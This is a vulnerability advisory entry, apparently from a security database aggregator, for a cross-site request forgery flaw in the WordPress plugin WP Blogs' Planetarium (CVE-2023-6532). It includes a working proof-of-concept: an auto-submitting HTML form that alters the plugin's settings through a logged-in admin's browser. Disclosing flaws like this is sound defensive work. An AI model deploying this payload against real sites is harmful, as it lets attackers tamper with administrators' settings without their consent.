Lucene search
Daniel RufWPEX-ID:05A730BC-2D72-49E3-A608-E4390B19E97FHistoryDec 18, 2023 - 12:00 a.m.
WP Blogs' Planetarium <= 1.0 - Settings Update via CSRF
2023-12-1800:00:00
Daniel Ruf
175
wordpress
csrf
settings update
exploit
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form action="https://example.com/wp-admin/options-general.php?page=wp-blogs-planetarium%2Fwbp.php" method="POST">
<input type="text" name="key" value="hacked">
</form>
<script>
document.forms[0].submit();
</script>Related
prion
prion
Cross site request forgery (csrf)
2024-01-08 19:15:00
nvd
nvd
CVE-2023-6532
2024-01-08 19:15:10
cve
cve
CVE-2023-6532
2024-01-08 19:15:10
wpvulndb
wpvulndb
WP Blogs' Planetarium <= 1.0 - Settings Update via CSRF
2023-12-18 00:00:00
cvelist
cvelist
CVE-2023-6532 WP Blogs' Planetarium <= 1.0 - Settings Update via CSRF
2024-01-08 19:03:04
AI Score
8.7
Confidence
High
EPSS
0.001
Percentile
24.1%
Related for WPEX-ID:05A730BC-2D72-49E3-A608-E4390B19E97F